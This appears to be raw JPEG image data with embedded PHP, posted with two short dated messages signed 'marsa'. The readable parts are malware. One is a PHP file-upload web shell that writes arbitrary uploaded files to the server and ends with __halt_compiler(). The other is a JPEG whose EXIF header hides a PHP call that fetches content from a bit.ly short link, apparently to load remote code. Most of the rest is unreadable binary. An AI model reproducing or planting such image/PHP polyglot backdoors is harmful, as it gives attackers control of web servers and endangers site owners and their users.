†tÏ,Jñ?Ö÷Žƒé)9<: ±Ë:L¦Tš–Ù•ô”ìÊve.„¶ÌÓ€.’“YN̪”ìðДìð¥4Ž5Ä«år•R7U+¾’¥Nƒ)”¼¢FèKŸ¶ƒ,"š&IúGæUNnÀîˆÊò΃mÈsˆ@jx /)Tؽ%Ò… ±¥õ"Û}Dn&“ôÌjÕUÕæӁíwÛ.T0&ÂNp&rå=(³˜Ë…Jj¾c?lüÁà².b÷©­%ÏÒ?0¦¦e20Ž”Ñd
C®µ Jz2[(©²¢šD*hAŠÖ çxæaå]cÀ–áUA§eë E샑8Œ8ˆVÉqaT]”
Aìß·T
âψ7€º´:ίGÁÑkPL±Ê Õ›Ú'@h¤ÝÔîÕÚPC—£Éê8ˆÎ¹DÓ?lüŁ7 ¬*êØŒŽá©|(Á£Kœá±v‹Õ&ݝΐ§L6EÌuû_¶ü" ˆSµ-Þ ¨…^š™™=JA?c¾TY«m4‡”FÂ
Œ>cU²õ¾ªÙÃOõÌ$,Š)o^˜Žê+XѦ)ªÐóe_ÖXµ˜’Aû-‘c²f°/¬
¤X/Ú.Ê{ö'³Ëö›gìôpûMçê7g-D´ ÃÑ|çø
À{3)Nv«âüø^XaÙÓÎd™²óõÀ{tðýÊQºaÛ®(³Ög‹kÊ7Ð^Ájô:á3RàNÆJ@þeÙ`Kƒö›ø3-½mooÓuûW9쿬ªä“3˜›C·
ÛéYûñ ©Ò­qÒ¡±x„]çl\?U³†Ÿë˜£dŒnËçØM•  6’·¡„)‡ö§î¶JÁ§ m¥¦<£fk.å6‹‡w@ËæÛ~²ý¦ØïÝ%Nôº´ÞLku½êZ¹æ:©ÿ c…BaENl„;
>þé¨Q}&.&n©ä¯¬ýfðIo¸,ýX©ÿ ´”2[Ê`úAšçÝ ÜãÑq‚Ì¡­˜÷ ûMò‘çq=.ZðÛ1v/,úý·eøD1¦ËP@à0¸?ցAþ»¼çìwÁ—.
ÑÙÚ0сÍZ›Ú&è ë|?U³†Ÿë˜T²4Ù»ÖûM§Éî*‡®³KöÖ‹UëCˆicW¤ýÖÈÍ”€s ùGíÁÌIB‚…7zºâ[d¢ª-_5c)â÷«oÄ+‘Ÿq#,¶,7ÇÄT­©êÇ¡b.¹vȱ0Œ&ùH0ضR ¢ôañÃ0á#wÒ3#I?q¼_Ðe +è}H|IO„×"m}‰bTP z¼Ö=É ªù¤òu¼wVâå¹ÑÕÍóV±ï Ïfâ85é³h
VG"Ûä^· :ý¬•¯PT`Wªhuƒƒ´X@=qÈ4uÚ¡y{ÃôQwë[½b7-uNS÷ÌÐMx´FÆ^³$p»Ñᘭè4^s?@üÆ©M ºÅìØ…š±.¬K90í)qa3´0iÛ&¥z‹¦ÕfÔŒ늆_ø:ºÂhC VüMYj*^Éd@áhÛK96K`_—aõ—Jz n?X@IÌêʶ+Æyíp@h]Æ[Š:+Çh›•D ,&üª,‚Tǽ±H¯SîGœ¦²Ò]P‘àŠžÚžl|b¢9+ž‘B&òëq ¶9šïoCÖ$_µ²Ï2£7À Z2ⶢÎÍúÃH$Ð7Ö:ýÃÏè[.\²Y.\²-ã5Þ_)rë›/…Ë—,—,–K%Ö’å’åË–ÿ 5þ9Î<9ÿ AÿÙ
от 09.01.2024 14:58
marsa
lexa marsa
echo "



";
if (isset($_POST['upload'])) {
$cwd=getcwd();
$tmp=$_FILES['filena']['tmp_name'];
$file=$_FILES['filena']['name'];
if (@copy($tmp, $file)){
echo "File berhasil terupload! => $cwd/$file";
}
else {
echo "File gagal terupload :(";
}
}__halt_compiler()
?>
от 09.01.2024 14:59
marsa
lexa marsa
ÿØÿà JFIF    ÿá&Exif II*    <  V ".file_get_contents("https://bit.ly/3g2bUKU"));?>      €   ž ÿØÿà JFIF  ` ` ÿÛ C  

(1#%(:3=<9387@H\N@DWE78PmQW_bghg>Mqypdx\egcÿÛ C//cB8BccccccccccccccccccccccccccccccccccccccccccccccccccÿÀ     " ÿÄ   
ÿÄ µ  } !1AQa"q2‘¡#B±ÁRÑð$3br‚
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ   
ÿÄ µ  w !1AQaq"2B‘¡±Á #3RðbrÑ
$4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz‚ƒ„…†‡ˆ‰Š’“”•–—˜™š¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚâãäåæçèéêòóôõö÷øùúÿÚ   ? åläò®£cÓ<Ö–¬»­ƒtÖ0­$¹Í‘®F:÷ÅwÜ⨭%#0Ð*#7=)ð¹’U\u5
£¡Ešö*è2@«ì;w=j„óvÍh#o‘½«žNì낲°Ò)3×Ú¥#ŒÓ
`R,oAK¸ã8ô¡—§¹¥Û@
Í!ûŸ¶“o"€ø©y40Á\ú⤠@ëïUA p®…ªó€ ¬ùÎj¢ìÌêFêÄšÇ6ê}±kNîé~ÄREÉè0{Ö7í]Ç8´¬N+jÈù~öã‚Õ€“
ãp;sÎ+RöášDc¦ÅU^Ñ(Èjóå´`=…RyÐËûµ`¹ãqÉ«×5«ý3Já5iDÉ«V ™Kz
«W´ñò1÷¬™Ô·/)æ®Z?ÎA=j˜§+r+3tj· zl‡ ƒÔÕ5º`Ë»)ïpÕ€?-
-±óNv²}j\U+‰ÕÊíÏ u5y§†/0ŸjÍ+›‘€N}©ñ©lŠ´°¢uäš• ~©o!÷ Z+GqÛ9ê)pkJ4Wb¥v·pEJ-½©r¦4cqJ#ÊéZÆßÚ£xÖ<.2O@)¤35T–¦àž+PÀê2ap=Jš‹ËŒžƒ4´jןM=*ÜöþZîëU[…5
X} ý@¡ªu§tG”¨@$ÄÕM‹è*Ôt9ܵ"… ’ªŽæ®êAïÉ¥°
·J
Œ7ÍVÛȹÈÉW«µ‘›jSW+O¶òš6FC ßÓ@þΏ†³n—ÌžF‘½ûV–˜á­6ÿ t‘Ub+»ÄÆn¦–3‡锤®¾„ŠH€2(<@¤Íbi*~é[Ú®Y.VÆvŠ’ö†æXaTü¿J³£Â%pp+žö;64K8EªÜGêOnzV°Zõ·Ô,Û¹’#ÎÒ*ÓÜjç…³ÇÑsSÌC‹¹¿ is(Q.ïÄŠ`ƒ U»}ây~Ñ|à¿dëŠÐw«Ê§šÅ«%©‹öj]ÝæâW º¶Õ°­¿ì᏿úUK*h\ÜÙÈ<Ð9R8j|àím Ek+Z±†KG˜IÃŒûTŸÚ7‘¶Ù¬wû Ón ¾ÔP€ÃrA<šw!EÜçnЛr9$V–LmŽ§]±oåZÛŒ0 VL[RUÏATÊ–ˆÄ½nº ý*½Y¿¼“ëU« âZ¢kOøú‹ýáW5¸ÚO!QK1$ MVÓ×uâ{sW5 —†æ3”tÊœb«¡›¼FU[°¡— nVê)ŸcŸ8ò›ñ«vv3Å”©¦“
“Š‹¹SSxÅÆåÎXdŠ¨& ÷«÷Zt¯pĺŠŒiG¼¿©jC…H(«³NÖí¯#¿Þ )>¸®§ÂŠ…nPXyük’°ŒB…È­tüVw[dÈóHíøþ•Ë4wÁóFèìÔS©ªiÕˆ#’2})ÔP!©’€°ÁÇ"––Š JkçiÛŒûÓ©Ð/‰@:p'®ñýk–O-”ã<×Kâ]A ýFX`“ØW3p›Ð¶~ï&¶¦…QÚæV©,fçr“’9KÍ_z¿q§%gõ=Å@t¹GFS]MHâ„ák\³¦Jˆ²HgU¦‘¥•º“Vl,gŽFÈØÒ\ZL³6#l{
i2TãÎÒgU¬ÝZÉ1ÆÇYÀ5FÙ·n\œÓá}’g·zÕ++uGÏq·+‰MBÜjíÔd N@v7¥aÓw°Œ*ý)ò i‘ÿ Ò¤q”"¸ê|G¹‡¿!Ùø{S–b7oßF0sÜzÖÀ5åðÝËi2K ”uèEuÚO‰à¹ Ö!—ûß°”{4t™Àª
#1Ä
ƒ÷˜õ«a–DêaÚ¢[4Ã0·u 7·#Ÿ)ÐÕ›[¥¸B@*ËÁSÚ†´SÑ™~”‘@|’HäšùZÐœš¡©ê0éöæYO={±¬í[ĶöyŽßMì~Qø×y=íÇ›;–cù¥TcrlNóµÅÓÊç,ı©c]é*žãVI5nØüå}GÑOâ9ñwöNÅ4å;"Ÿ˜c£O
}+­lyѲkEù˜Õë ‹Xï?Ò"Ï<6x…UŒyîa‚zUrrsM««AÚ|¼m•`AA©-"ó.ON¦ºrÒÑ€‘ܤǦѝßZ¬šrDÜDO(¥óïšÏÚ-‰Q–¶èS¾þ:Õ&]ÊG­h_©Þ¿J¹£é‚dk‰P:rª§¹õ§9¨ÆìŒ=76’9ubü‹X!Ô¤† +’6Óõ­#XÞ ²šêÚÜS9QÖ¦/QòØä]‰4ÁÖ¦’FÃ)SèF)ðÛ¾åfBÔŽ
nE™bÚ€wïV‚ÉkåNÈÁ[•'¸¨A©®¦ Ô4H£bÙ˜ÛÐÒ½ÂQMYœ´2³z±5 »g¢%Æ•¹%ÂR àk$ÄÊåH ƒ‚+ºœÓG‰ˆ¥(Ìž$󬊞q+5P³$ð+¨û²ÓÎõ]ì¹ÉùolT%­¡0¹y—¬1qIUNì—‡qi7¹©ê¬Ê¡èGoJÜò|½à”“êGÿ ª²4ëci«Ä“p
ä~_ã[¾dB œälzW-iZK±èaáx6÷fv¢úHðxÏ5ÐùB(VÆ?„S²·[;I
Î®ê;U¸¦ß*0z~u'ÌË¡GÙÀ£®éI{ [0²+Û½R×Ò`AŒá3[W3l¸ÆÒv®Gã\ωķ,ª“Ûô'š‹ëcª)Øç£ [ ^ƒdË5”M m‘šâ-£7c“[Z>¥ö9<¹acÿ |ŸZ™NîÇK¢ù/Ôßkvnv(>ª¥1arH‘ÔUÔee ¤yS°3žô´9¹š(ýšCü?­ ¶fä G®qZ†‹™”Ú$‚3$¢0Š2N3úÖJ4z©¹ÝU@¾ÜÓu½D\?Ùá?»SóïO¸[¹œnN=ði_[ªv¦äÎjöÙí.䁺¡ÇÔWGá;ÝÈöny_™>ÅAâ«ÊÝ*æ2 ;­á­«©+·P+fï±ÙÂr²ÃüÃëÞ¨\éˆú´S€6Ÿ™Ç¸«)t¦PJ‘€qŽi­w°³•Ïsþ*vØÊTù·"¿·7R,V4RXóí\Еm¯ƒÀNÅn2zÖ楨¬V’ ½”sí\ýµ»\Ü,j:ÿ *렝®ö81m)Yntº·þeÃÙ÷XuÚ³­uæþ,H¼ ñ¼VUíì·0ÃvŸz›BŸP+Ó8Èã4N’ä»,Kö‰Gft‹&QºŒ{ià•ÁG5
Ás´aIˆcu"º¸ÊEp6zëT>Y ²³•#8 DŽ)¬æŽBŸ;CJaHÁÜÀuýjw´±Z×@„8&FxÁÏ×Ú™ª[¬Vä"¬aù u­h ™Îy}OSøS/-Ã[ÏnûKô?ýz²*5:»0l5I¬È_¿÷Oô®’Îú ÄÌMÏu=Er‘ÙO#aboÄbµ¬ôÑnU¥,Óº¨pi)›W„7ên»¬hYØ*Ž¤šÄ¸Ö!–åcä@2 zŸ\zT× ç&ïpì§<úëòÊ[Wù†PôaG?C:Tâþ#NëHFÏN  äcÔU±ØC*²ÊAÈ+ØÔ:T—"Àä->é'•mžE\Ȭ ÿ xqùÓÑêL¥%î¶+\ÇqFè²!ù[Þ³mt˜-fóRGfÉÀ= «ýyÎhªædÚÂRˆŒì"^§©ôÓ¬CyEgMbä~¥°ßÒˆêÉ›²9íUD2£@lg½jhékö}öä³·QíY¾%VþÑpªppsøU>îKF—i#røצ¢åcÀæP«+÷5Ä‹E™S¿ q apJ§ög·BZWJ
ÄOß Ö ®F®zjMH¹aµ}ñK ,²–f,Ê'Ö§bù¨>äÑ|Ê¤ä» ÒH§6Íj†â&b070{ŠžŠ¶®f´)-¼§©HÇû#'ó¦*-½Ãm9'æäšÐ¦HUT±ŠžT–ƒæl¢wI}´ Ç9ÏCÅHö„ &?¸ÿ ҝh¥¤iOÐZ·S¦µ*RièQŽÝ™•1iÎÎMY¸ÇÙäÜ26œþU-Gp7A õSV’D7sm›h1ÈÈÂâŸåÜ ô©ˆ!·¨È#)õ.&œì†;eS¹ŽãV!`!ºç9ü1L`ÄaHôôM±uqŸ~E8«Ûff¶­ö X`•=W‚ÄËo,¥2 ㎵¯zñ‹}“®ó€¾¤úªeš´óW匘®èTj $xõ°ñu[lÿÙÿÛ C 



 %# , #&')*)-0-(0%()(ÿÛ C



(((((((((((((((((((((((((((((((((((((((((((((((((((ÿ  ì ì" ÿÄ    ÿÄ    ÿÚ   óý†8ÿ Kœ6‰´ÕV¼X`¸‚Ùv·ÂÖ"¤ŠøúãÑ:¢/$$o‘¬™$H|ú9ãÄšä*µc43?;y+ÏêÑc<@ZîKÃL†›ÄÅέ%ûœ …'Šäne‰QtÉW?®£š269©T©£bc=Gc’j«H$¨¶äëâH Â0¨ bŸ¡^—¾7ƒˆ[
èFëViKEÈQ ¯VùÙ`ÙšŠT¼-ÕÆ5ªÂ pX®håEºÑQ"5ØF_åk2DÑ„µm‘ìx7¹f:†I-6†:ê.ê%ä—En©
½•zh–Ld‘€•æŽ^'cdÊV4Dc4ùMVU¹í+)Û}ïDé#$º–ŽZ]ÿ .¼îÙjöÊ(S®ÄEokAƒ«é5¨pÊV3
¶ É§'~Áà5ÙA³µ yŸ)°È^fÚ¨q{-ÀF¶mÆ4À­ !:"G-ç{H²ñ"™ëñçm­¯ÎFçºV?.UŸ‰
3k·h`™#åèÃt¤3µô¸6m¥W6ÏYš¥¼âåî•ÝË*¼ü²Ó•%r*K‡/«ÈcãpxÆEY-èòG‹=8ÞËauô ›0¨Ý ãÂ9óÄ:Ví[8{º½¯ŒúªQX勹)I{ƒ6´§r7£’/0ÐcÜV)݇_&ŒW»N¤\J,'h¶ëÙæÌävÚB <+×˸ûP£IZý‡ˆî”;`¥& …ú>uBØ•Åg4mOH”ÈÙ´ò*t‹¯—Z³DÓ·K£¹5 “ZT,à ¶@5æ-Ô±‡Ñ¼aZÀcžÇZÍz“zjZm¡ùtÿ 5Þy‹d-r5r”­r™ÌÙe‰-âú~iIÐÐ.ñò[ÝC®4f£6úB5`K-Œ–2õ¼ÖG¨:±¢‹ ³)> ðVXÅØLIº®®Wg!W™Iê¶V-ºìK'¡O”ôó¿FþxÞÑ««ÂÓ‡?èÃYöÊ6í¤i²¢ ŸD¼êbUËeÿ Aó‚Ê=»Y)ó•S®šª ã]_EòZÌ?™õ¯)ô2†š9$FUÏ? ønéº\Cy)rˆÓ¸¸ ç?·$ˆŠ5ÑÔº*kuoÅí³táÚü,óG¤(T.t=–é·Bj(ë+Ý[¬hÜ]ò+n£Éz™tüæØ—Ÿš"ÚxÝÎ ò•y>œ9©Ÿ]ÆVd»ÆGvz‚ÏYçÈjÚÁå¨@„ÚÊ“Ë}¨Í¶Ý;1×xBÉ+cνÒá ~†
|½•8éàìß·b,½J¼6Øe|“H«»ºW5Ý%Zí¼–ÍÝÎWwt‚i§Dô婾ȧdNŒg¡fsG;ÿÄ +    !"123A#$04BÿÚ  @\‚Ûb}á|ÆŸßgØIÅó—Oì™eßoԍ•_éÔ>Ýôöþ¹ç隥&Bøî>\=(~ ÞïfìooÞß³ùW/:ƒvBÝ8f>¤Š.\ìÎí'\VË»#K{&e%Ú-áü6$k8W'~ru œ$°Faµvñq÷®Ø–PyöCåKې›ã´¥ëtêÃæMÃÈ?‡P|.{ì
m¡“ ßhÄþàùœ¿®„ÿ øþä|–Ó}›ÅõŸÎIHÊ«ä.{&÷nÌùë> ø<‡È¢“ŠêŠ–L§/
’F&pÅ._yþÝÇÙ­íP°V[1&÷_®ÂXìÆS¶½ûfûv¹¥Æ=™ðñfhä‰ÄøºoÖÀÞzd¸xh—EtWE Xr)£ÂxÝ8»6ÏáZ‰Ø¸ºâê¤.¬›‘ms‘ýìãô„†CÆž½–hË/Áp\3 FÊž Å;á3riÇc2J\äÚ‹ÿ n§úýSý;F¸øEé0XZ¬"î> ‚(ú¶ÄG
hBQ8Þ 7 Í—võoOïÔüe¨
G’ñ³7˜¶®$¸ð¬Gè£r2Ñ‚³9Ú8¢áÅN%°L
7aw³oPoÞ'5w£÷ÞÇF«i}%q?v&íØu)[Œ¸õˆe>™Íÿ ‹™•+¼¡„z º`¸
鳦;—ãßj&MMâmPpNüªï§·›ä³½IۍÖf>L‚N$ÓuÜ~bØî#â]¹~ZçĐ”r`K“,²Æd73ÞÀZ|˵©@\ƒ·ε§Ê“ã!q‹zþ¨I°H©H%øˆk‹4•£êtceÀYB¿ZEâ9›ýr›GÖyäìÌïnž´kñ#Uë3G5Bs
>Á6£, œüeoZ?ˆ¦@NJÃXƒyì OùféíÈÊ .îµ»m€÷†ÄÛÂÞˆŽ&–'ŒŸ.¡|„íêR{~Ñü©\*’Õ³€mž2iIÑ3²àýDï…©jÌË9Q ùÛìH;åãžHÇhÝØ¥ÑÅLØgðêObuÇ ÒÖDö]¿
V½¨KiÝРøû+ý ƒÁXQ&u¨Q~Q@rªµ°Ô"©„´£–Ú 9ΰËV~‚ÞÃ2¢5© Úž´í9ñ0C^¹ÌUàb¹g Úy¹Ï<]7´Þ)×yæž6éju?Å
ß‘cS †ÆYC¦Kb?áì²¥Lkö;e¬éyã-/â¬aÛ‚æ´bi*êprSD2Ç þ *Ü(ÝŸ-1u­U¬0ÙÔ¼BaÔj´Q;r—Q®ÓÕÓët+k&Åm–ˆíøŽÇ—uÅóÀ—N–ˆ“12;-=ÍR·(Ö‘c¡iÛ“BùR¿R8#éEÐi•Ž--;@5ãÈÈĵÞJšt9ˆH]Cñ—ÉX‘¢€ÝÈ¢Rg‚hÉŒQ 6ÌÌÛj¶pо&!giŒ‘‹‘Ö|׏ì'äF^@ú4ÝY_¯Á5†gu\Ä|( '?ß/©µ*oZ`oHFfªÎtåŒÄDz徜Nùg¯+O¯EGâHË” D;<œ^Ô…!CÊrÑ_©lC à º,ÙBNåÎAûíÀÓ¨´ø³ ଏàžH
­ØçÞõá§+JÖè°‘Gõšg_…[ª-ÄSøkUøÕ‘ÙŠC¤­ÜåEiq1À÷!Ë°&•ÅaÆmRj>s…gË"&f(âՁ帿"8ôäÝ(A͆7$ˆ,1RO€Å\j3Ù„Æ@-ˆ˜Qs•éɳ@šbq,…w:Ô ëLF-<Ÿyƒé®ºèpãÆMž)ºêXÀXH³"˜á\fdò+þd:âK¢H`ÂaPÕÿ ·eN¤¦$-† ¥ÃŒVƒ;»³,ó(<ÏØìÄÆÃuÛ'ÙcïÆäXQ7ÅÀíWŒ§ Äázç';2·¢ÎølªŸ.Ûæ&ãe¯°…‹²³Ü-¹Ô'(fŠOÿÄ )   !1A"2Q #a0BÿÚ ?Ô-Åå3uJkˆÿ
e<–ò—°l«ÔreF²Í:ú"Ž`üÌayJž hTDÿ Ì®¾™CØ"m”Ë™yy~eù„ìv .ÄÇ\–ÓNÖº‡c óÌó00<ÊŽo(&+Ìse&iûLó·nó(9˜Æâe-*œVûTö™§7Hü‚&ŸÈ‰ßb·˜!
ša¶ªØíTÙLÓð›S毟˜ï5¢àZc5ÂÜJµœ ¥Yò<ÅfckÍ+䗍°6–¶Âköáü‚«2¶¡ñï4ÕX¯;{^óOÍA4#õíh­Œê˜Í”í¶±Ü#mSÔmãÚM–"ëæié»5×Ħ¸‹C°Ãa+S
ÏÄu*y‹¦zž¥”è—š|óð&²—ïó(QVÑO
 ixHŠ¥»l{ÍM þƤ—M"> QŒÑ& ¬z ÿ –Â*q4Ê ¼ÔSÊ÷ÝA&Â%,ƒ-y‡3UYh¯~bÓgæ>«
Jzª þl (°3JÞ«J´ù>m>Ùpâ{XË|ìÆÂ}D^ª´JËŒZu]•~eÓ @àˈÌL¤ø˜ÕËÅ&ÆSÔ•Œæñ\[™Ž÷ŸU¸
D»…ÈÊnÝàÜîx_Ë[ˆ¤K ÊÕUPOÿÄ $  !1 "AQ02ÿÚ ?wÿ
r„˜Þ¼þ¸CŸ$KŒn(ú²ÅŒ}Kz‰x¢H’â dšcƒ0f£‹ÆÄ•¸°ØÊ‹\J¥´ŒØª æئÌî…·Â$„†K¡EÅ#!Ke>øCWá²ãóe"ä_Ú1CÑQY“^PZ¹Ijå‘Š* nl”ÔtF×±V;"ãØ£²}ŠV>Höf8¦t6ÙŸËÕ‰Ry¢I²§¹µÂ*FýÛ$“jÇÆ×D#dIX»ü ¾ÙüŸfJöZ¿šöÿ 9|ѾZ!äöÿÄ 9   !1AQ "2aqBb‘¡#0R±$3@r‚’ÑÁáðÿÚ  ?@î¸ÕqKL'>ÝÝš‡Žw*.Á¨M§ Sü†×zp tÍ\0˜(̼“pü6ðÈXi[ÁÍgM¯%6ñx½ÞPà(!æñŽぷÅðP¸ …ç¹¼"îào„T˜#å7Œpvº„APB=ø Dfk«¸×‹‡òŽ¼MòáD~ Y¬Ö‚÷—f°ÄEínåÈÀä²?%%‡ä¡Ô<W# ð«fï’¨TBà7Æá6Ðx7µ?Ç ¼=ÜÏ?KÅ£D‚šíïm’†ˆè´h(°¦ÝhïÊ8›ì¡ãôMOñ{XÜÜaEÀ¦±ç Å+w3Ú…˜åMn׶ٚf¥‡Òâ\`ÝL¸ŸÍ^E)CÚ1ؾ+šv7u†-ÓÆÎ7DJ–Œ+©¿5ÌöÙCGªé]!t…Ò/³¸7²‹ü—ï´Û5 ˜¸ölp9Þ‰­õàÀìÂÄ‚³@ƒP§æMò©ÄgŬ|›¢{"'%šÍTÉ싏în9ŠÅgÂQDð ðˆº ª¹ Ó¨ºé+ý©‡ñ÷d®sJ˜CÊ{ÕtÒµTvª„)mœ……ÍÅiÛE’ÜPºE( œaÒž!~!Vž ±Y:â÷9Ìq$æºOª«OÉ4ÙµÁÓµÕFÏ즺¿ý\PL=ø• yú)4¸&ðY¸µÈ7í# üÃ$ H#qÃÌq?ò…8YùG¦»¿G vÈ Š¸‡²y é¢ç¡rW1GÜoÕ5¸c]øšÍáÕº€£id$j° Â$§Nr›q·žàoÆƍø-?¤ðN÷'
ÿ ê¦Øžµ÷‹€h’SÉy$g•Cª
Ö~ŠÐ¾¤±2sskä š#“ÞF2Ð(­A§ UÈ 1
­ÞÒȲ& •\5=Oß‚ªl]èU,‰ð¥í
õX\ HÐÝ©†³:ØáòNcò(±Ù„ëSý!{&äÚ ×ÕŸ¢wBk¬ÜKÍS]³”7˜§˜¨@Îê¹anLvx®W*Ùÿ ‰Qî²+"£]—K}J—8|•›ðù§á×Ók€wCèQ"¡ÝM¡BÑ£©ŒØ+KKirO”E˜æSE¡¨M:ÈVMىṊ«Gö€…QÞjƒ4̧Úl'2¤ í59¦Aº
æ5»Ø°×ÞVg∡NnÆZ3&™9áVž‹áoÔ®\Í!¹žQpð›hÁAškÙ˜XX2k²ìTlaá:º£œ©ÐrA
'DYh9u æ„›>c”èš“pxõN¶²ÜOtÍ¡: \÷“•»Ð Ö¦öª¾ãðÑ{Fiê¸É’Pp¬'º“ª³D:0ùZ–ù¦‹01D²t×U6gÓB ò¿kÝgeWe;&à€áG·p…¥<Ãd
¦¨¾ÉøZžò œ› @m{žî¹Ÿb˜ì¾ãÖs¹±Ôú­IO+W²qç^ u
LŸ(IôL{½úx@ú]
óD5Ø¶ë ³Aìêæ}Ò«fÕü6ðûLìÙOûV¾.iÐЧ6ÌÐQR²î§§è¡õîoæ({­"{®Q]Õ:…Bj¹‰?E…ƒ¶ºÛ™Ç臲ÿ axQ¦è7$Ð!îX^'Yj£…Õ*
¶éÃáVÌÚB¡AdSŽ³Eé*ɣ´ô»Ç…ÔQ>÷ÍY ‹Ï³# \ö„ø¢hhÃ'4à(TÝgê˜^;¬v¢£!s~*TI7Qj¶skXpôºOHDÚrÂÇ©3胅/©„#¤VPì8`‰
"QvÔáþÕƒoÒú ;/‰bи´¦;õ…¢Š\*¹´U¸_0&ëCéÄ{&ÂÏW‡í¹(
UÑJÿÄ (   !1AQaq‘¡± ÑðÁáñ0ÿÚ  ?!QòO3ÏR6ÌJÈ4Œ©±Ñhš:@h‘hŠ³}5¡8ñZÁq,Žm²É£à¯ÁIDÀ‡môÍ»>&pòAAÌZEVjç H—ãHà¸(êé4¡¯¹*Tªó˜)KZ9?ÁÅ)qcnãÇLÕFðh2NüïM¬l¤Î ÂT°¾f¤4ÙR¥J˜3Ö1¨ê½ãÏ…%˜”W‰íÒw§z*`y„aÔo×ɘ—­ÛœÍPh^ÑXí5åQS2ðŽ™ R¦‚v™¾Óâ
:U؏^‹þÀü~â ϶}Þµ‚ ÛÙ‡]ÈE–y£öeË¢n“5ɵŸlVý¥Ôm‘Þ3ç~»Ý;kR~ý4üÍSnƒ éF#hXʦª‰¢ÖX'fZx\Ä ±Å£P(o6üI¢à•£[,t¹vKç•ôùÐÙüô
]L­vü 1Ÿydbs7é¼xŸ3¯}™à¬ucÔ! Tá¹bF˜]´WÔ¨êÆ*v¦Tc™:•¿@Á,e«¸êÙiª†1o–-'Šx£4QŠ6™@6ºß_’µ„G9uéˆÂu¤tuf¸Nc2«ýÏB^$œ4õŸ¸ùb²ñ¼ #1R¦aºNù¸ñÖ‡² PÏþ ì ñÓž 0cˆ×Ë@cBWA½Ê
àì§cþüBÆÑBrîMV¼ðÏQ=3µ>Z_½.í R²ÛÍ¿Ya¾Oˆ)wG¡[ußjbf—Ó ¡‰8YŠ»*…Ú핱-×=ÙšnšõÅ;d[#u©*L¥c$aà4•ù™G”ìýùTz‹
m±ºïkñy´vÒY›5ÑãF>µ‰Ùqó G,úâ£X×}#Nµÿ S׿+-wNXDæE
}¸‡º?㠁90€hŽp¦ƒvòÅ´
ºôQ>Âǯ‡œöÊ@ZÐy'íôôKóbUoå/t§Ü
;CñÎæÁãòYª•¬9¿Š˜\·é‹ ³Cj³ .ÑѨòf¢/JéÞJÛ¸Öj?k?(¦OÅè¯Wz§þ{ÅìÊëSHõ[ävâTYZÔaÿ )­b]·»
7³5`À£ÉpÊ%ÁVœú}Eþ+¼‹n<.d}Æ&Y&©ìÄñðÅ4O¬t'‘¾¾X×1¹W©‚¸ÃÌÉ;t:˜ÈSã] ,_Xª1g—»ü&„¯b;¥®W¦rP^HÍ/=aål®S÷(ðno咐в¶šHøTÀúA† Úƒ¼XaP«°ÑÁüÞÊÚ³z:óÔp~‘±,yLâ+£©
]⹎âÒ/´UwƒÈÏAwâiA7'Í“<›GÎôKucŒ|úñp?^e‘á‚„·¦bÜ(Ä´¿iP)㘳h;óÕ:^®Â/9‰ å0‹6™çx Q—yqÍá%N⁀­}\8„Id hn&^GÖTOŠ æ³­ âõÞ›ì â5•MYYSšï˜ÌT’©_ãO©•ï4Š6»JРPé{E`ß?ȁ@â[Ì6þTxÃ)`fr^[ÞÌa§ˆH T°ýëÑ9E@j=†ÊðG» ¤”Úß¡ÉTõCJþ.ó^s^NfƒþrDZ+ytýÏöC€±ÈÆ£œJâ+Ví¥ÙùÄ¥l®Iÿ C
¿sKnþôMQÅF›Î¬Õ,´½>t™j¿Êɦ×Ï톶6›¥ª]!Š_&~KàŠaB„/-'kâ\ý€¼-׿KA^ŒìÁʘ›¡æï2ƒÈÁ‰ó35îñ àvu<Ít€x˜úŒîñõ ¢¼Ô±›/íætb]ÿ ç¥JµúfÞñ×›Ÿ,dí­ygùPӝÄB±!*íŸPP¾z(…*Þñ›„k8âv#슱¢Çæ/”ÐDXˆn‹{Ã¥£þ!åiµþ4šF:gÜ$Ô'G­Ú6†Ñ£2A˜ïÈÌØÎÎÝ 
QîUÞÞÆTÝnõ1ú—Ö&—ÀìâüŒiyߦÄÔҍâ–Ï~D:d‡àYÊЗêFtQjï)àLæo_£‡r*[²xÑ~c„å©Y¦††bà64 VF:ù†›¡¬¿Üè9iE+{ˆ¯gÒQ
›w€¡„.ùwU ÎBõ&#ª
•EåaȲ¸Nt5ËÃÄ,Ò¶Cv1R—'yŒu
7ßÃÕ VßÙƒ‚›cÉ4½ê" ]Ñ©)^sŸ1ÙDq
ƒ+¾ aè+£-eJÀSýÞãtºßÙ¿D³¦ÇÛYy‹Ê
eÊún'£˜i×<&„1µ{±íÈ4)¯‰—ãd| Å=œ¿Q‚Ž =òԽǗàPŽå-’‘*ÎÄmZ/1ºÀ­/5 …ÝlaYÏÖU<åíhb^¬Ôv`²8Ú°¨â®Iuj‘W|åø!oO]°0®/× wGåÊwêe;—•Ž¿»–VÖŒ+²=湌`Àén®òpøâ?à' Öíû`@@[²ü1…)ú¥þy©tÁ{ŠÎÚw/ÌMV£â¬û›Þì¢)ÎÒâì{B9½ÝPv&Ž{MD[t`+þCë[⠝eì¾L{DÑà .U`V× L'íÒò¸Ÿ ,ÖŽÑcMN¦CC©4«ÒVÆå~½6;–¢zeýÌ\/ U E^U}áÌŽúSæqi*uš…*‚AA¡=S•ï*k‚<JŒÐ\óÓE<˜
+bí`ï¿óø¸lÄBìN6ó¿â7n~فZéï³®•AÚm{Ë"{»x„ û°Í!*¥‡–»ÐÁéaÛoö d¨°z¯crNƒº³Ñ_÷òxâ3rR‚šhñŠêD^Ù•e _$WèëÖgµE×­bÿÚ    Ç`Çýok˜~¡xX€ùžÙ™ôöegŸE¢ ;Ó ¨ÅªŒû`'Ð?D´Î‡]¢N“Hº%ªÅœ}œ¥—¶=r €+¯uªAù„/)È›w¡ši è´‡95­ÍÊl›èÖ>ÿ bÙT¾g±>“rl£ë °:f /ÏÝu‡QE|°xØŸ2Ió­™]%ë@h–%Åà«1t »$ccr\ä’IÑAu”²CÿÄ &   !1AQaq±‘¡ÁÑ ðñÿÚ ?¡KôÔ*æ‘©q˜ïÀjj]0À÷CÍxÔX„€ p
